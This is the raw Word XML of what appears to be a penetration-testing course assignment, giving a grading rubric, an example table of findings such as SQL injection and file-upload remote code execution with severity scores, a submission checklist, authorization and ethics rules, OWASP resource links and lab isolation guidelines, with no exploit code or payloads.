                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="254A41B6" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29D1B713"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Reconnaissance (Part A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D692D4A"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76FB6478"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Complete technology identification with tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="1CC8AF14" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC7AF2C"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Assessment Quality (Part B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0397EC7A"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7657AE5A"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Multiple vulnerability classes identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="6DDDFEA6" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59F159D2"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Exploitation Proof (Part C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B0FB90A"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="453A6FC0"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Successful POC of multiple vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="7EF2D924" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="787F27B4"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Remediation Advice (Part D)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="412318E8"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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A7F4123"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Actionable, specific recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="75955032" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45813CFA"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Report Quality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A0D2940"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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35F43B57"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Professional, complete, well-organized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="23D21E92" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C3274F6"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Tool Usage &amp; Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36BE09AA"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="338581D2"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Proper use of Nikto, Burp, Gobuster, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EEB933E"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Example Vulnerability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1885"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="1784"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="689"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="2644DEEF" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E7C80F3" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="496BB26F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43A92317" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AB4103B" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DF9054" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B0F21C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9219C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-GB"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="73273C55" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B294A98"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Outdated Apache Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A1F85E8"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Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6660E334"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DF93E7F"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Apache 2.4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DDF6A99"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CVE-XXXX-XXXXX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F094EF8"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5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="2D3A61C6" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43428A94"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Directory Listing Enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ACB39C9"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Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1174D50D"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A1DFF1B"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/uploads/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BD08F2A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B112EBB"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4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="4077C804" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33C5B85B"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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="433E4337"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Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A56BBF"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53236543"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login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FF0A43E"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD99D64"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8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9219C" w:rsidRPr="00D9219C" w14:paraId="003AE792" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E410E41"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File Upload RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30CCB46C"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Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="383260C9"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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FB7D8C8"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upload.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B0461B9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0225D3CC" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">
            <w:pPr>
              <w:spacing w:after="0"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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6ED270D4"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Submission Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F6CF9"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Before submitting, verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E444EC6" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 Report is 10+ pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8EABE3" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 All 5 sections completed (A-E)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156518E1" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 At least 10 screenshots included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62783B7D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 Minimum 2 vulnerabilities demonstrated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F1CC0" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 Remediation advice provided for all findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424ED2A2" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 Professional formatting and structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F3655E" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 Proper citations included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6884C327" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 No unauthorized system access described</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483FA09C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 File naming convention followed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C015AA9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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 ] Spell-checked and grammar-reviewed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFFE500" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Important Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76012882"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Scope Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257BF8A4" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Only test authorized systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE7755" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Do not access systems beyond lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034C3DC" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Do not extract sensitive data unnecessarily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034A8972" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Do not leave shells or backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D878892"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Ethical Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F2D0F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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lastRenderedPageBreak/>
        <w:t>Include disclaimer about authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C05ECF" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Document scope and rules of engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D01F42D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Respect legal boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F015F66" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Focus on education, not harm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B5D266"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Resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4455871E" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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OWASP Top 10: https://owasp.org/Top10/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D71AD" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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OWASP Testing Guide: https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6EC348" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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CWE Top 25: https://cwe.mitre.org/top25/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564654EE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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CVE Database: https://cve.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63351C01" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="6605C140">
          <v:rect id="_x0000_i1034" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="078041A3" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>LAB SAFETY &amp; SECURITY GUIDELINES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E62B393" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Isolation First:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> All labs must run on isolated networks or single machines without internet access to unauthorized systems</w:t>
      </w:r>
    </w:p>
